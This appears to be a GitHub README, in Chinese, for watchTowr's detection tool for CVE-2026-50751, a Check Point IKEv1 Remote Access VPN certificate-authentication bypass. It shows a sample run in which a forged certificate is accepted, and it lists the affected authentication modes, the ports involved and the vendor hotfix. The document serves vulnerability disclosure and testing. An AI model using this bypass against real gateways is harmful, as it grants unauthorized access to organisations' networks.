watchtowrlabs/watchTowr-vs-Check-Point-CVE-2026-50751

# CVE-2026-50751 一个 Check Point Remote Access VPN IKEv1 证书认证绕过检测工件生成器。 https://github.com/user-attachments/assets/1280c545-364e-42d1-94ac-5b2cd850d14e 有关技术细节，请参阅我们的[博客文章](https://labs.watchtowr.com/)。 # 检测实战 ``` $ python3 watchTowr-vs-Check-Point-CVE-2026-50751.py -rh vpn.example.com -u watchtowr __ ___ ___________ __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ \/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__| \/ \/ \/ watchTowr-vs-Check-Point-CVE-2026-50751.py (*) Check Point IKEv1 Remote-Access VPN certificate-auth bypass Detection Artifact Generator - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber) CVEs: [CVE-2026-50751] [#] CVE-2026-50751 Check Point IKEv1 Remote-Access certificate-auth bypass [+] Self-signed cert (untrusted); signature will be invalid (no private key) [#] Connecting via udp ... [#] Authenticating as 'watchtowr' with the forged certificate + invalid signature... [#] Decrypting... [+] Gateway Internal IP: 172.31.255.128 [+] [BYPASSED] Gateway authenticated us as 'watchtowr'. CVE-2026-50751 certificate-authentication bypass confirmed. ``` # 用法 需要 Python 3 和 `cryptography` 包： ``` pip install cryptography ``` # 描述 此 watchTowr 检测工件生成器用于检查并演示 Check Point Remote Access VPN / Mobile Access 认证绕过漏洞 **CVE-2026-50751**（CVSS 9.3，CWE-287）。远程且未经认证的攻击者可以完成已弃用的 IKEv1 phase-1 交换，并在没有有效证书、私钥或密码的情况下，以已配置的 Remote Access 用户身份通过认证。它可以通过 IKE（UDP 500/4500）和 Check Point Visitor Mode / SSL（原始 TCP 443，TCPT）进行利用。 当网关配置为使用旧版 IKEv1 路径（允许旧版 Remote Access 客户端，允许 IKEv1（而非仅限 IKEv2））时，即存在暴露风险。 证书认证绕过适用于 `Certificate`、`Certificate with enrollment` 和 `Mixed` 用户认证方式；普通的 `Legacy`（用户名/密码）无法被绕过。 修复方案及更多详细信息，请参阅 Check Point 安全公告和热修复补丁 **sk185033**： - https://support.checkpoint.com/results/sk/sk185033 - https://blog.checkpoint.com/security/check-point-releases-important-hotfix-for-vulnerabilities-in-deprecated-ikev1-vpn-protocol/ # 关注 [watchTowr](https://watchTowr.com) Labs 如需获取最新的安全研究，请关注 [watchTowr](https://watchTowr.com) Labs 团队。 - https://labs.watchtowr.com/ - https://x.com/watchtowrcyber

标签：CISA项目, Python, VPN, 无后门, 身份验证绕过, 逆向工具